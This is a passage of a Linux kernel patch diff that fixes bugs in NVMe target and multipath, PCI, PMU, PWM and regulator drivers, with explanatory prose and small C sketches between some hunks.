++++ b/drivers/nvme/host/multipath.c
+@@ -213,7 +213,8 @@ static struct nvme_ns *__nvme_find_path(struct nvme_ns_head *head, int node)
+ 		if (nvme_path_is_disabled(ns))
+ 			continue;
+ 
+-		if (READ_ONCE(head->subsys->iopolicy) == NVME_IOPOLICY_NUMA)
++		if (ns->ctrl->numa_node != NUMA_NO_NODE &&
++		    READ_ONCE(head->subsys->iopolicy) == NVME_IOPOLICY_NUMA)
+ 			distance = node_distance(node, ns->ctrl->numa_node);
+ 		else
+ 			distance = LOCAL_DISTANCE;
+diff --git a/drivers/nvme/target/auth.c b/drivers/nvme/target/auth.c
+index 4dcddcf95279b..e900525b78665 100644
+--- a/drivers/nvme/target/auth.c
++++ b/drivers/nvme/target/auth.c
+@@ -284,9 +284,9 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 	}
+ 
+ 	if (shash_len != crypto_shash_digestsize(shash_tfm)) {
+-		pr_debug("%s: hash len mismatch (len %d digest %d)\n",
+-			 __func__, shash_len,
+-			 crypto_shash_digestsize(shash_tfm));
++		pr_err("%s: hash len mismatch (len %d digest %d)\n",
++			__func__, shash_len,
++			crypto_shash_digestsize(shash_tfm));
+ 		ret = -EINVAL;
+ 		goto out_free_tfm;
+ 	}
+@@ -368,7 +368,7 @@ int nvmet_auth_host_hash(struct nvmet_req *req, u8 *response,
+ 	kfree_sensitive(host_response);
+ out_free_tfm:
+ 	crypto_free_shash(shash_tfm);
+-	return 0;
++	return ret;
+ }
+ 
+ int nvmet_auth_ctrl_hash(struct nvmet_req *req, u8 *response,
+diff --git a/drivers/nvme/target/configfs.c b/drivers/nvme/target/configfs.c
+index 73ae16059a1cb..2e87718aa194d 100644
+--- a/drivers/nvme/target/configfs.c
++++ b/drivers/nvme/target/configfs.c
+@@ -537,10 +537,18 @@ static ssize_t nvmet_ns_enable_store(struct config_item *item,
+ 	if (strtobool(page, &enable))
+ 		return -EINVAL;
+ 
++	/*
++	 * Take the global nvmet_config_sem because the disable routine has a
++	 * window where it releases the subsys lock, giving a parallel enable
++	 * a chance to run concurrently and leave the disable path with a
++	 * miscounted ns percpu_ref.
++	 */
++	down_write(&nvmet_config_sem);
+ 	if (enable)
+ 		ret = nvmet_ns_enable(ns);
+ 	else
+ 		nvmet_ns_disable(ns);
++	up_write(&nvmet_config_sem);
+ 
+ 	return ret ? ret : count;
+ }
+@@ -615,6 +623,18 @@ static struct configfs_attribute *nvmet_ns_attrs[] = {
+ 	NULL,
+ };
+ 
++bool nvmet_subsys_nsid_exists(struct nvmet_subsys *subsys, u32 nsid)
++{
++	struct config_item *ns_item;
++	char name[12];
++
++	snprintf(name, sizeof(name), "%u", nsid);
++	mutex_lock(&subsys->namespaces_group.cg_subsys->su_mutex);
++	ns_item = config_group_find_item(&subsys->namespaces_group, name);
++	mutex_unlock(&subsys->namespaces_group.cg_subsys->su_mutex);
++	return ns_item != NULL;
++}
++
+ static void nvmet_ns_release(struct config_item *item)
+ {
+ 	struct nvmet_ns *ns = to_nvmet_ns(item);
+diff --git a/drivers/nvme/target/core.c b/drivers/nvme/target/core.c
+index 3235baf7cc6b1..7b74926c50f9b 100644
+--- a/drivers/nvme/target/core.c
++++ b/drivers/nvme/target/core.c
+@@ -423,10 +423,13 @@ void nvmet_stop_keep_alive_timer(struct nvmet_ctrl *ctrl)
+ u16 nvmet_req_find_ns(struct nvmet_req *req)
+ {
+ 	u32 nsid = le32_to_cpu(req->cmd->common.nsid);
++	struct nvmet_subsys *subsys = nvmet_req_subsys(req);
+ 
+-	req->ns = xa_load(&nvmet_req_subsys(req)->namespaces, nsid);
++	req->ns = xa_load(&subsys->namespaces, nsid);
+ 	if (unlikely(!req->ns)) {
+ 		req->error_loc = offsetof(struct nvme_common_command, nsid);
++		if (nvmet_subsys_nsid_exists(subsys, nsid))
++			return NVME_SC_INTERNAL_PATH_ERROR;
+ 		return NVME_SC_INVALID_NS | NVME_SC_DNR;
+ 	}
+ 
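
The core.c hunk distinguishes a namespace that is configured but currently disabled (retryable path error) from one that was never configured (invalid NSID). A plain-C sketch of the lookup split; the table and status values are illustrative, not the real nvmet types:

#include <stddef.h>

#define SC_INVALID_NS     0x0b	/* illustrative status codes */
#define SC_INTERNAL_PATH  0x07	/* retryable path error */

struct ns { unsigned int nsid; int enabled; };

static int find_ns_status(const struct ns *tbl, size_t n, unsigned int nsid)
{
	size_t i;

	for (i = 0; i < n; i++) {
		if (tbl[i].nsid != nsid)
			continue;
		return tbl[i].enabled ? 0 : SC_INTERNAL_PATH;
	}
	return SC_INVALID_NS;	/* never configured at all */
}
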
+diff --git a/drivers/nvme/target/nvmet.h b/drivers/nvme/target/nvmet.h
+index 273cca49a040f..6aee0ce60a4ba 100644
+--- a/drivers/nvme/target/nvmet.h
++++ b/drivers/nvme/target/nvmet.h
+@@ -527,6 +527,7 @@ void nvmet_subsys_disc_changed(struct nvmet_subsys *subsys,
+ 		struct nvmet_host *host);
+ void nvmet_add_async_event(struct nvmet_ctrl *ctrl, u8 event_type,
+ 		u8 event_info, u8 log_page);
++bool nvmet_subsys_nsid_exists(struct nvmet_subsys *subsys, u32 nsid);
+ 
+ #define NVMET_QUEUE_SIZE	1024
+ #define NVMET_NR_QUEUES		128
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 3480768274699..5556f55880411 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -297,6 +297,7 @@ static int nvmet_tcp_check_ddgst(struct nvmet_tcp_queue *queue, void *pdu)
+ 	return 0;
+ }
+ 
++/* If cmd buffers are NULL, no operation is performed */
+ static void nvmet_tcp_free_cmd_buffers(struct nvmet_tcp_cmd *cmd)
+ {
+ 	kfree(cmd->iov);
+@@ -1437,13 +1438,9 @@ static void nvmet_tcp_free_cmd_data_in_buffers(struct nvmet_tcp_queue *queue)
+ 	struct nvmet_tcp_cmd *cmd = queue->cmds;
+ 	int i;
+ 
+-	for (i = 0; i < queue->nr_cmds; i++, cmd++) {
+-		if (nvmet_tcp_need_data_in(cmd))
+-			nvmet_tcp_free_cmd_buffers(cmd);
+-	}
+-
+-	if (!queue->nr_cmds && nvmet_tcp_need_data_in(&queue->connect))
+-		nvmet_tcp_free_cmd_buffers(&queue->connect);
++	for (i = 0; i < queue->nr_cmds; i++, cmd++)
++		nvmet_tcp_free_cmd_buffers(cmd);
++	nvmet_tcp_free_cmd_buffers(&queue->connect);
+ }
+ 
+ static void nvmet_tcp_release_queue_work(struct work_struct *w)
+diff --git a/drivers/pci/controller/dwc/pcie-tegra194.c b/drivers/pci/controller/dwc/pcie-tegra194.c
+index 5d1ae2706f6ea..0839454fe4994 100644
+--- a/drivers/pci/controller/dwc/pcie-tegra194.c
++++ b/drivers/pci/controller/dwc/pcie-tegra194.c
+@@ -2250,11 +2250,14 @@ static int tegra_pcie_dw_probe(struct platform_device *pdev)
+ 		ret = tegra_pcie_config_ep(pcie, pdev);
+ 		if (ret < 0)
+ 			goto fail;
++		else
++			return 0;
+ 		break;
+ 
+ 	default:
+ 		dev_err(dev, "Invalid PCIe device type %d\n",
+ 			pcie->of_data->mode);
++		ret = -EINVAL;
+ 	}
+ 
+ fail:
+diff --git a/drivers/pci/pcie/edr.c b/drivers/pci/pcie/edr.c
+index 87734e4c3c204..35210007602c5 100644
+--- a/drivers/pci/pcie/edr.c
++++ b/drivers/pci/pcie/edr.c
+@@ -32,10 +32,10 @@ static int acpi_enable_dpc(struct pci_dev *pdev)
+ 	int status = 0;
+ 
+ 	/*
+-	 * Behavior when calling unsupported _DSM functions is undefined,
+-	 * so check whether EDR_PORT_DPC_ENABLE_DSM is supported.
++	 * Per PCI Firmware r3.3, sec 4.6.12, EDR_PORT_DPC_ENABLE_DSM is
++	 * optional. Return success if it's not implemented.
+ 	 */
+-	if (!acpi_check_dsm(adev->handle, &pci_acpi_dsm_guid, 5,
++	if (!acpi_check_dsm(adev->handle, &pci_acpi_dsm_guid, 6,
+ 			    1ULL << EDR_PORT_DPC_ENABLE_DSM))
+ 		return 0;
+ 
+@@ -46,12 +46,7 @@ static int acpi_enable_dpc(struct pci_dev *pdev)
+ 	argv4.package.count = 1;
+ 	argv4.package.elements = &req;
+ 
+-	/*
+-	 * Per Downstream Port Containment Related Enhancements ECN to PCI
+-	 * Firmware Specification r3.2, sec 4.6.12, EDR_PORT_DPC_ENABLE_DSM is
+-	 * optional.  Return success if it's not implemented.
+-	 */
+-	obj = acpi_evaluate_dsm(adev->handle, &pci_acpi_dsm_guid, 5,
++	obj = acpi_evaluate_dsm(adev->handle, &pci_acpi_dsm_guid, 6,
+ 				EDR_PORT_DPC_ENABLE_DSM, &argv4);
+ 	if (!obj)
+ 		return 0;
+@@ -85,8 +80,9 @@ static struct pci_dev *acpi_dpc_port_get(struct pci_dev *pdev)
+ 	u16 port;
+ 
+ 	/*
+-	 * Behavior when calling unsupported _DSM functions is undefined,
+-	 * so check whether EDR_PORT_DPC_ENABLE_DSM is supported.
++	 * If EDR_PORT_LOCATE_DSM is not implemented under the target of
++	 * EDR, the target is the port that experienced the containment
++	 * event (PCI Firmware r3.3, sec 4.6.13).
+ 	 */
+ 	if (!acpi_check_dsm(adev->handle, &pci_acpi_dsm_guid, 5,
+ 			    1ULL << EDR_PORT_LOCATE_DSM))
+@@ -103,6 +99,16 @@ static struct pci_dev *acpi_dpc_port_get(struct pci_dev *pdev)
+ 		return NULL;
+ 	}
+ 
++	/*
++	 * Bit 31 represents the success/failure of the operation. If bit
++	 * 31 is set, the operation failed.
++	 */
++	if (obj->integer.value & BIT(31)) {
++		ACPI_FREE(obj);
++		pci_err(pdev, "Locate Port _DSM failed\n");
++		return NULL;
++	}
++
+ 	/*
+ 	 * Firmware returns DPC port BDF details in following format:
+ 	 *	15:8 = bus
+diff --git a/drivers/perf/arm_dmc620_pmu.c b/drivers/perf/arm_dmc620_pmu.c
+index 54aa4658fb36e..535734dad2eb8 100644
+--- a/drivers/perf/arm_dmc620_pmu.c
++++ b/drivers/perf/arm_dmc620_pmu.c
+@@ -513,12 +513,16 @@ static int dmc620_pmu_event_init(struct perf_event *event)
+ 	if (event->cpu < 0)
+ 		return -EINVAL;
+ 
++	hwc->idx = -1;
++
++	if (event->group_leader == event)
++		return 0;
++
+ 	/*
+ 	 * We can't atomically disable all HW counters so only one event allowed,
+ 	 * although software events are acceptable.
+ 	 */
+-	if (event->group_leader != event &&
+-			!is_software_event(event->group_leader))
++	if (!is_software_event(event->group_leader))
+ 		return -EINVAL;
+ 
+ 	for_each_sibling_event(sibling, event->group_leader) {
+@@ -527,7 +531,6 @@ static int dmc620_pmu_event_init(struct perf_event *event)
+ 			return -EINVAL;
+ 	}
+ 
+-	hwc->idx = -1;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/perf/hisilicon/hisi_pcie_pmu.c b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+index c4c1cd269c577..49f2d69c119df 100644
+--- a/drivers/perf/hisilicon/hisi_pcie_pmu.c
++++ b/drivers/perf/hisilicon/hisi_pcie_pmu.c
+@@ -326,15 +326,27 @@ static bool hisi_pcie_pmu_validate_event_group(struct perf_event *event)
+ 			return false;
+ 
+ 		for (num = 0; num < counters; num++) {
++			/*
++			 * If we find a related event, then it's a valid group
++			 * since we don't need to allocate a new counter for it.
++			 */
+ 			if (hisi_pcie_pmu_cmp_event(event_group[num], sibling))
+ 				break;
+ 		}
+ 
++		/*
++		 * Otherwise it's a new event but if there's no available counter,
++		 * fail the check since we cannot schedule all the events in
++		 * the group simultaneously.
++		 */
++		if (num == HISI_PCIE_MAX_COUNTERS)
++			return false;
++
+ 		if (num == counters)
+ 			event_group[counters++] = sibling;
+ 	}
+ 
+-	return counters <= HISI_PCIE_MAX_COUNTERS;
++	return true;
+ }
+ 
+ static int hisi_pcie_pmu_event_init(struct perf_event *event)
+diff --git a/drivers/perf/hisilicon/hns3_pmu.c b/drivers/perf/hisilicon/hns3_pmu.c
+index 16869bf5bf4cc..60062eaa342aa 100644
+--- a/drivers/perf/hisilicon/hns3_pmu.c
++++ b/drivers/perf/hisilicon/hns3_pmu.c
+@@ -1085,15 +1085,27 @@ static bool hns3_pmu_validate_event_group(struct perf_event *event)
+ 			return false;
+ 
+ 		for (num = 0; num < counters; num++) {
++			/*
++			 * If we find a related event, then it's a valid group
++			 * since we don't need to allocate a new counter for it.
++			 */
+ 			if (hns3_pmu_cmp_event(event_group[num], sibling))
+ 				break;
+ 		}
+ 
++		/*
++		 * Otherwise it's a new event but if there's no available counter,
++		 * fail the check since we cannot schedule all the events in
++		 * the group simultaneously.
++		 */
++		if (num == HNS3_PMU_MAX_HW_EVENTS)
++			return false;
++
+ 		if (num == counters)
+ 			event_group[counters++] = sibling;
+ 	}
+ 
+-	return counters <= HNS3_PMU_MAX_HW_EVENTS;
++	return true;
+ }
+ 
+ static u32 hns3_pmu_get_filter_condition(struct perf_event *event)
+@@ -1515,7 +1527,7 @@ static int hns3_pmu_irq_register(struct pci_dev *pdev,
+ 		return ret;
+ 	}
+ 
+-	ret = devm_add_action(&pdev->dev, hns3_pmu_free_irq, pdev);
++	ret = devm_add_action_or_reset(&pdev->dev, hns3_pmu_free_irq, pdev);
+ 	if (ret) {
+ 		pci_err(pdev, "failed to add free irq action, ret = %d.\n", ret);
+ 		return ret;
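
Both PMU hunks fix the same bounds bug: the old code only compared the final counter total, so a group with more distinct events than hardware counters could write past event_group[] before the check. The fixed loop rejects a new event the moment the counter budget is exhausted. A userspace sketch, with MAX_HW_COUNTERS and same_event() as stand-ins:

#include <stdbool.h>
#include <stddef.h>

#define MAX_HW_COUNTERS 8

static bool same_event(int a, int b) { return a == b; }

static bool validate_group(const int *events, size_t n)
{
	int used[MAX_HW_COUNTERS];
	size_t counters = 0, i, j;

	for (i = 0; i < n; i++) {
		for (j = 0; j < counters; j++)
			if (same_event(used[j], events[i]))
				break;		/* shares an existing counter */
		if (j == counters) {		/* needs a new counter */
			if (counters == MAX_HW_COUNTERS)
				return false;	/* over budget: reject now */
			used[counters++] = events[i];
		}
	}
	return true;
}
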
+diff --git a/drivers/pwm/pwm-sti.c b/drivers/pwm/pwm-sti.c
+index 0a7920cbd4949..a0467f0b549c2 100644
+--- a/drivers/pwm/pwm-sti.c
++++ b/drivers/pwm/pwm-sti.c
+@@ -571,6 +571,7 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ {
+ 	struct device *dev = &pdev->dev;
+ 	struct sti_pwm_compat_data *cdata;
++	struct pwm_chip *chip;
+ 	struct sti_pwm_chip *pc;
+ 	unsigned int i;
+ 	int irq, ret;
+@@ -578,6 +579,7 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 	pc = devm_kzalloc(dev, sizeof(*pc), GFP_KERNEL);
+ 	if (!pc)
+ 		return -ENOMEM;
++	chip = &pc->chip;
+ 
+ 	cdata = devm_kzalloc(dev, sizeof(*cdata), GFP_KERNEL);
+ 	if (!cdata)
+@@ -623,40 +625,28 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	if (cdata->pwm_num_devs) {
+-		pc->pwm_clk = of_clk_get_by_name(dev->of_node, "pwm");
++		pc->pwm_clk = devm_clk_get_prepared(dev, "pwm");
+ 		if (IS_ERR(pc->pwm_clk)) {
+ 			dev_err(dev, "failed to get PWM clock\n");
+ 			return PTR_ERR(pc->pwm_clk);
+ 		}
+-
+-		ret = clk_prepare(pc->pwm_clk);
+-		if (ret) {
+-			dev_err(dev, "failed to prepare clock\n");
+-			return ret;
+-		}
+ 	}
+ 
+ 	if (cdata->cpt_num_devs) {
+-		pc->cpt_clk = of_clk_get_by_name(dev->of_node, "capture");
++		pc->cpt_clk = devm_clk_get_prepared(dev, "capture");
+ 		if (IS_ERR(pc->cpt_clk)) {
+ 			dev_err(dev, "failed to get PWM capture clock\n");
+ 			return PTR_ERR(pc->cpt_clk);
+ 		}
+ 
+-		ret = clk_prepare(pc->cpt_clk);
+-		if (ret) {
+-			dev_err(dev, "failed to prepare clock\n");
+-			return ret;
+-		}
+-
+ 		cdata->ddata = devm_kzalloc(dev, cdata->cpt_num_devs * sizeof(*cdata->ddata), GFP_KERNEL);
+ 		if (!cdata->ddata)
+ 			return -ENOMEM;
+ 	}
+ 
+-	pc->chip.dev = dev;
+-	pc->chip.ops = &sti_pwm_ops;
+-	pc->chip.npwm = max(cdata->pwm_num_devs, cdata->cpt_num_devs);
++	chip->dev = dev;
++	chip->ops = &sti_pwm_ops;
++	chip->npwm = max(cdata->pwm_num_devs, cdata->cpt_num_devs);
+ 
+ 	for (i = 0; i < cdata->cpt_num_devs; i++) {
+ 		struct sti_cpt_ddata *ddata = &cdata->ddata[i];
+@@ -665,28 +655,7 @@ static int sti_pwm_probe(struct platform_device *pdev)
+ 		mutex_init(&ddata->lock);
+ 	}
+ 
+-	ret = pwmchip_add(&pc->chip);
+-	if (ret < 0) {
+-		clk_unprepare(pc->pwm_clk);
+-		clk_unprepare(pc->cpt_clk);
+-		return ret;
+-	}
+-
+-	platform_set_drvdata(pdev, pc);
+-
+-	return 0;
+-}
+-
+-static int sti_pwm_remove(struct platform_device *pdev)
+-{
+-	struct sti_pwm_chip *pc = platform_get_drvdata(pdev);
+-
+-	pwmchip_remove(&pc->chip);
+-
+-	clk_unprepare(pc->pwm_clk);
+-	clk_unprepare(pc->cpt_clk);
+-
+-	return 0;
++	return devm_pwmchip_add(dev, chip);
+ }
+ 
+ static const struct of_device_id sti_pwm_of_match[] = {
+@@ -701,7 +670,6 @@ static struct platform_driver sti_pwm_driver = {
+ 		.of_match_table = sti_pwm_of_match,
+ 	},
+ 	.probe = sti_pwm_probe,
+-	.remove = sti_pwm_remove,
+ };
+ module_platform_driver(sti_pwm_driver);
+ 
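
The pwm-sti conversion above replaces hand-rolled of_clk_get_by_name()/clk_prepare() pairs, pwmchip_add() and the whole .remove() callback with their device-managed counterparts, devm_clk_get_prepared() and devm_pwmchip_add(), so every acquired resource is released automatically, in reverse order, when the device unbinds. A stripped-down sketch of the resulting probe shape; driver-specific fields are elided, and a real chip would need working pwm_ops:

#include <linux/clk.h>
#include <linux/device.h>
#include <linux/err.h>
#include <linux/platform_device.h>
#include <linux/pwm.h>
#include <linux/slab.h>

static const struct pwm_ops example_pwm_ops;	/* illustrative placeholder */

static int example_pwm_probe(struct platform_device *pdev)
{
	struct device *dev = &pdev->dev;
	struct pwm_chip *chip;
	struct clk *clk;

	chip = devm_kzalloc(dev, sizeof(*chip), GFP_KERNEL);
	if (!chip)
		return -ENOMEM;

	/* Got and prepared now; unprepared and put automatically on unbind. */
	clk = devm_clk_get_prepared(dev, "pwm");
	if (IS_ERR(clk))
		return PTR_ERR(clk);

	chip->dev = dev;
	chip->ops = &example_pwm_ops;
	chip->npwm = 1;

	/* Registered now; removed automatically, so no .remove() callback. */
	return devm_pwmchip_add(dev, chip);
}
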
+diff --git a/drivers/regulator/bd71828-regulator.c b/drivers/regulator/bd71828-regulator.c
+index a4f09a5a30cab..d07f0d120ca71 100644
+--- a/drivers/regulator/bd71828-regulator.c
++++ b/drivers/regulator/bd71828-regulator.c
+@@ -207,14 +207,11 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 			.suspend_reg = BD71828_REG_BUCK1_SUSP_VOLT,
+ 			.suspend_mask = BD71828_MASK_BUCK1267_VOLT,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+-			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+ 			/*
+ 			 * LPSR voltage is same as SUSPEND voltage. Allow
+-			 * setting it so that regulator can be set enabled at
+-			 * LPSR state
++			 * only enabling/disabling regulator for LPSR state
+ 			 */
+-			.lpsr_reg = BD71828_REG_BUCK1_SUSP_VOLT,
+-			.lpsr_mask = BD71828_MASK_BUCK1267_VOLT,
++			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+ 		},
+ 		.reg_inits = buck1_inits,
+ 		.reg_init_amnt = ARRAY_SIZE(buck1_inits),
+@@ -289,13 +286,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_BUCK3_VOLT,
+-			.idle_reg = BD71828_REG_BUCK3_VOLT,
+-			.suspend_reg = BD71828_REG_BUCK3_VOLT,
+-			.lpsr_reg = BD71828_REG_BUCK3_VOLT,
+ 			.run_mask = BD71828_MASK_BUCK3_VOLT,
+-			.idle_mask = BD71828_MASK_BUCK3_VOLT,
+-			.suspend_mask = BD71828_MASK_BUCK3_VOLT,
+-			.lpsr_mask = BD71828_MASK_BUCK3_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -330,13 +321,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_BUCK4_VOLT,
+-			.idle_reg = BD71828_REG_BUCK4_VOLT,
+-			.suspend_reg = BD71828_REG_BUCK4_VOLT,
+-			.lpsr_reg = BD71828_REG_BUCK4_VOLT,
+ 			.run_mask = BD71828_MASK_BUCK4_VOLT,
+-			.idle_mask = BD71828_MASK_BUCK4_VOLT,
+-			.suspend_mask = BD71828_MASK_BUCK4_VOLT,
+-			.lpsr_mask = BD71828_MASK_BUCK4_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -371,13 +356,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_BUCK5_VOLT,
+-			.idle_reg = BD71828_REG_BUCK5_VOLT,
+-			.suspend_reg = BD71828_REG_BUCK5_VOLT,
+-			.lpsr_reg = BD71828_REG_BUCK5_VOLT,
+ 			.run_mask = BD71828_MASK_BUCK5_VOLT,
+-			.idle_mask = BD71828_MASK_BUCK5_VOLT,
+-			.suspend_mask = BD71828_MASK_BUCK5_VOLT,
+-			.lpsr_mask = BD71828_MASK_BUCK5_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -494,13 +473,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO1_VOLT,
+-			.idle_reg = BD71828_REG_LDO1_VOLT,
+-			.suspend_reg = BD71828_REG_LDO1_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO1_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -534,13 +507,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO2_VOLT,
+-			.idle_reg = BD71828_REG_LDO2_VOLT,
+-			.suspend_reg = BD71828_REG_LDO2_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO2_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -574,13 +541,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO3_VOLT,
+-			.idle_reg = BD71828_REG_LDO3_VOLT,
+-			.suspend_reg = BD71828_REG_LDO3_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO3_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -615,13 +576,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO4_VOLT,
+-			.idle_reg = BD71828_REG_LDO4_VOLT,
+-			.suspend_reg = BD71828_REG_LDO4_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO4_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -656,13 +611,7 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 				     ROHM_DVS_LEVEL_SUSPEND |
+ 				     ROHM_DVS_LEVEL_LPSR,
+ 			.run_reg = BD71828_REG_LDO5_VOLT,
+-			.idle_reg = BD71828_REG_LDO5_VOLT,
+-			.suspend_reg = BD71828_REG_LDO5_VOLT,
+-			.lpsr_reg = BD71828_REG_LDO5_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+@@ -721,9 +670,6 @@ static const struct bd71828_regulator_data bd71828_rdata[] = {
+ 			.suspend_reg = BD71828_REG_LDO7_VOLT,
+ 			.lpsr_reg = BD71828_REG_LDO7_VOLT,
+ 			.run_mask = BD71828_MASK_LDO_VOLT,
+-			.idle_mask = BD71828_MASK_LDO_VOLT,
+-			.suspend_mask = BD71828_MASK_LDO_VOLT,
+-			.lpsr_mask = BD71828_MASK_LDO_VOLT,
+ 			.idle_on_mask = BD71828_MASK_IDLE_EN,
+ 			.suspend_on_mask = BD71828_MASK_SUSP_EN,
+ 			.lpsr_on_mask = BD71828_MASK_LPSR_EN,
+diff --git a/drivers/regulator/irq_helpers.c b/drivers/regulator/irq_helpers.c
+index fe7ae0f3f46af..5ab1a0befe12f 100644
+--- a/drivers/regulator/irq_helpers.c
++++ b/drivers/regulator/irq_helpers.c
+@@ -352,6 +352,9 @@ void *regulator_irq_helper(struct device *dev,
+ 
+ 	h->irq = irq;
+ 	h->desc = *d;
++	h->desc.name = devm_kstrdup(dev, d->name, GFP_KERNEL);
++	if (!h->desc.name)
++		return ERR_PTR(-ENOMEM);
+ 
+ 	ret = init_rdev_state(dev, h, rdev, common_errs, per_rdev_errs,
+ 			      rdev_amount);
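
The irq_helpers fix duplicates the caller's descriptor name with devm_kstrdup() instead of keeping the pointer aliased by h->desc = *d, so the helper no longer dangles if the caller's string has a shorter lifetime. The take-ownership-of-a-borrowed-string pattern, sketched with the real devres call (struct and function names here are illustrative):

#include <linux/device.h>
#include <linux/errno.h>
#include <linux/slab.h>

struct helper {
	const char *name;	/* owned copy, not the caller's pointer */
};

static int helper_init(struct device *dev, struct helper *h, const char *name)
{
	/* Duplicate rather than alias: freed automatically with the device. */
	h->name = devm_kstrdup(dev, name, GFP_KERNEL);
	if (!h->name)
		return -ENOMEM;
	return 0;
}
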
+diff --git a/drivers/regulator/vqmmc-ipq4019-regulator.c b/drivers/regulator/vqmmc-ipq4019-regulator.c
+index c4213f096fe57..4f470b2d66c97 100644
+--- a/drivers/regulator/vqmmc-ipq4019-regulator.c
++++ b/drivers/regulator/vqmmc-ipq4019-regulator.c
+@@ -84,6 +84,7 @@ static const struct of_device_id regulator_ipq4019_of_match[] = {
+ 	{ .compatible = "qcom,vqmmc-ipq4019-regulator", },
+ 	{},
+ };
++MODULE_DEVICE_TABLE(of, regulator_ipq4019_of_match);
+ 
+ static struct platform_driver ipq4019_regulator_driver = {
+ 	.probe = ipq4019_regulator_probe,
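
This one-liner (like the two greybus ones further down) exports the OF match table into the module's metadata. Without MODULE_DEVICE_TABLE(of, ...), the compatible strings never reach modules.alias, so udev cannot autoload the module when a matching device-tree node appears. The usual shape, with a hypothetical compatible string:

#include <linux/mod_devicetable.h>
#include <linux/module.h>
#include <linux/of.h>

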